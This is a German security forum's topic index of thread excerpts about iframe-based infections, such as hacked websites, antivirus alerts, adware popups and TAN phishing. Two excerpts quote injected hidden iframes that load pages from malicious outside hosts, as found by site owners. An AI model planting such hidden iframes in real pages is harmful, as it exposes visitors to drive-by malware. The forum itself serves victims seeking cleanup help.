Zurück   Trojaner-Board > Themen

Alles zum Thema: Iframe

  Letzter Beitrag Antworten Hits Forum
Windows 7: Avast blockiert Html:Iframe-Virus - PC sicher?
Iframe - Hallo, ich hoffe, ihr könnt mir mal wieder weiterhelfen. Heute kam beim Aufrufen einer Internetseite die Meldung von Avast, dass es eine Bedrohung gefunden und eine Infektion blockiert hat. Es handelt sich dabei um HTML:Iframe (trj) und Firefox.exe wäre davon betroffen. Leider war die Meldung so...
Log-Analyse und Auswertung
OkayFreedom VPN - Firefox Addon = Keylogger?
Iframe - Hallo liebe Forummitglieder, im Addon Firebug ist mir aufgefallen, dass mein Firefox auf allen seiten das JavaScript unter "https://a.xfreeservice.com/partner/UnhyLrS9/?cid=1&sid=steganos" lädt. Dafür verantwortlich ist das Addon vom VPN-Programm OkayFreedom. Wenn ich mir den Inhalt so anschaue,...
Diskussionsforum
Typosquatting-Seite besucht, droht Gefahr?
Iframe - Hi, gerade eben wollte ich Youtube besuchen, muss mich aber vertippt haben. Ich landete auf einer leeren Seite, das Ladezeichen im Firefox-Tab hat rotiert. In der URL stand irgendwas von browser height und iframe, ich nehme an, die Seite hat den Browser-Fingerprint genommen. In Panik habe...
Plagegeister aller Art und deren Bekämpfung
Auf fragwürdige Webseite gekommen - wie schlimm
Iframe - Hallo, zuletzt wollte ich mich über aktuelle Spiele informieren und auf die bekannte Seite gamestar.de gehen. Leider vertippte ich mich und kam auf die Seite: h**p://www.gamesstar.de/ Was zunächst scheint wie ein deadlink lädt leider über ein iframe Daten von einer anderen Seite. Bin...
Diskussionsforum
Website meldet Threat von Sophos erkannt!
Iframe - Guten Morgen, ich pflege unsere Vereinshomepage und nachdem sie bereits zweimal durch Strato gesperrt wurde wegen einer Abuse Meldung, komme ich einfach nicht weiter. Ich muß dazu sagen, ich bin eher der Laie was IT angeht. Wenn ich die Website aufrufe bekomme ich folgende Meldung: "Threat von...
Plagegeister aller Art und deren Bekämpfung
Chrome öffnet beim Surfen automatisch neue Seite http://static.icmapp.com/
Iframe - Hallo, ich bin neu hier und muss vorweg erwähnen, dass ich nicht der mega Computer-Kenner bin. Seit neuestem habe ich jedoch ein Problem, was mir etwas komisch vorkommt. Während des Surfens (Google Chrome) poppt teilweise wenn ich auf etwas klicke ein neues Fenster auf mit der Adresse: ...
Plagegeister aller Art und deren Bekämpfung
Trojaner lässt Werbung und Popups auftauchen
Iframe - Hallo, ich habe seit etwa einer Woche ständig auftauchende Popups und Werbung, wo eigentlich andere Werbung auftauchen sollte. Seiten wie ad.adserverplus. treten als Popup auf, wenn ich neu auf eine Seite gehe. Ich habe schon OTL. heruntergeladen und gescannt: OTl.txt:
Log-Analyse und Auswertung
Wordpress Blog infiziert Mail von Google erhalten
Iframe - Hallo Leute, ich habe von Google eine Mail erhalten, dass mein Blog infiziert ist. Habe einen Code Schnipsel entdeckt, der mir höchst verdächtig vorkommt, habe ihn gegooglet und nur 4 Anfragen bekommen, sie hat mich hierher geschickt, leider kann ich auf ne Thread nicht antworten. Es ist dieser...
Log-Analyse und Auswertung
js/agent.axquo in php-File
Iframe - Hallo, wie ich schon im Thread gestern (http://www.trojaner-board.de/131640-js-agent-axquo-html-datei.html) erwähnt habe, wurde der Code meiner Homepage befallen. Die HTML-files konnte ich von Hand bereinigen, leider habe ich nicht genug php-Verständnis um den anbei geschickten Code zu...
Plagegeister aller Art und deren Bekämpfung
PUP.Blabbers und Trojaner gefunden
Iframe - Guten Tag, das heir ist mein erster Post im Trojaner-board, hab mich extra wegen meinem Problem registriert und bin nur ein Privat-nutzer und kein Computer Genie. Jedenfalls hab ich gestern meinen PC im vollständigen Scan mit Malwarebytes durchsuchen lassen. Gestern hatte ich 5 Trojan.Swisyn,...
Log-Analyse und Auswertung
http://ad.adserverplus.com/ erscheint beim Besuchen diverser Webseits!
Iframe - Hallo, beim Öffnen diverser Websites, die ich sonst regelmäßg besuche, öffnet sich folgender Link: hxxp://ad.adserverplus.com/st?ad_type=iframe&ad_size=800x440&section=2971503&pub_url=${PUB_URL} Was soll ich nun machen? Bitte um Hilfe!
Log-Analyse und Auswertung
Drive by Infektionen auch mit deaktiverten Scripten und Java möglich?
Iframe - Hi, es steht ja eigentlich schon alles im Betreff: ich nutze Firefox u.a. mit Noscript und das Java Plugin ist deaktiviert. Es ist so trotzdem noch möglich, sich bei einem Drive by auf einer Webseite etwas einzufangen, speziell mit den beliebten Iframe oder JS.Redirector? Gruss und Danke,...
Diskussionsforum
Problem mit Webseite und cikutalist-wo das Problem posten?
Iframe - Offensichtlich wurde meine Webseite (CMS4You basiert) "modifiziert". Eines der Probleme war:"###<iframe src='hxxp://cikutalist.com/bonus/' width='1' height='1' style='visibility: hidden;'></iframe>###" - was beim Aufruf des Admin zu obiger Seite führte. Problem erstmal gelöst (index.php vom...
Mülltonne
Tan Phishing bei Volksbank
Iframe - Hallo, seit ein paar Tagen wird bei meinem Onlinebanking versucht Tans zu phishen. Auch ein IFrame, mit einer Liste für 20 Tans. Hier ein paar mehr infos: hxxp://forum.kaspersky.com/index.php?showtopic=173740 Scheint auf den ersten Blick wohl das selbe zusein wie hier:...
Plagegeister aller Art und deren Bekämpfung
h**p://www.Brenz.pl/rc/
Iframe - Hi ihr, ich habe gerade einen frisch formatierten PC vor mir, der leider letzten Monat von Viren und Trojanern überwältigt wurde. Jetzt versuche ich grade, so langsam alle gesicherten Daten wieder rüberzuziehen und z.B. an meiner Homepage weiterzuarbeiten. Nun fiel mir dabei auf, dass sich auf...
Plagegeister aller Art und deren Bekämpfung
1und1-Server infiziert gehostete Websites
Iframe - Mehrere meiner bei 1und1 gehosteten Websites wurden infiziert - ein iFrame wurde eingeschleust, der folgendermaßen aussieht: <iframe src="http://xd4.ru:8080/ts/in.cgi?pepsi123" width=125 height=125 style="visibility: hidden"></iframe> Wird eine infizierte Seite aufgerufen, werden Schadprogramme...
Plagegeister aller Art und deren Bekämpfung
was ist HEUR/exploit.htm?
Iframe - Hallo Leute! C:\Dokumete und Einstellungen\*****\Lokale Einstellungen\Temporary Internet Files\Content.IE5\D2DDRJ37\iframe3.htm Ich bekomme mindestens 2-3 mal die Wochen diesen Fund vom Antivir als HEUR/Exploit.htm!! Kann mir jemand sagen was das ist und wie ich das verhindern kann und Wie...
Plagegeister aller Art und deren Bekämpfung
iframe Virus schreibt sich in index.html Seiten
Iframe - Habe seit einiger zeit problem mit trojaner iframe Virus schreibt sich in index.html Seiten - Trojaner-Board Dachte hatte das problem gelöst aber doch nicht jetzt bekomme ich die email von meinem server anbieter das ich viren verbreite...... Kann mir jeman dbei helfen dieses zu lösen! ...
Plagegeister aller Art und deren Bekämpfung
Was ist das?
Iframe - Hallo Bin neu hier und habe euch durchzufall gefunden..ich hoffe bin hier richtig mit dem was ich poste :) Also es geht um Folgendes...Ich habe ein Board das wbb2.3.6 und seit ei igen tagen stimmt da was nicht...in der index.php schleicht sich immer dieses ein <iframe...
Plagegeister aller Art und deren Bekämpfung
iFrame
Iframe - Hallo, seit ich ein neues PC habe, kann ich meine Emails nicht mehr auf gmx lesen. Es erscheint die Meldung, dass mein Browser kein iFrame unterstützt. Ich habe auch nach iFrame downloads gesucht, aber nichts gefunden. Benutze übrigens Internet Explorer Vers. 7.0. Danke.
Alles rund um Windows
bloodhound.exploit.6
Iframe - Hallo, nicht schimpfen, wenn ich einen thread wiederhole ! Die Webseite einer Freundin hatte auf zwei Seiten einen IFrame mit einer URL auf eine komische Webseite; beide Seiten haben beim Oeffnen einen Virusalert fuer Bloodhound.Exploit.6 getriggert. Bei mir hat AV zugegriffen, sie hat gar...
Plagegeister aller Art und deren Bekämpfung
Archiv
Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.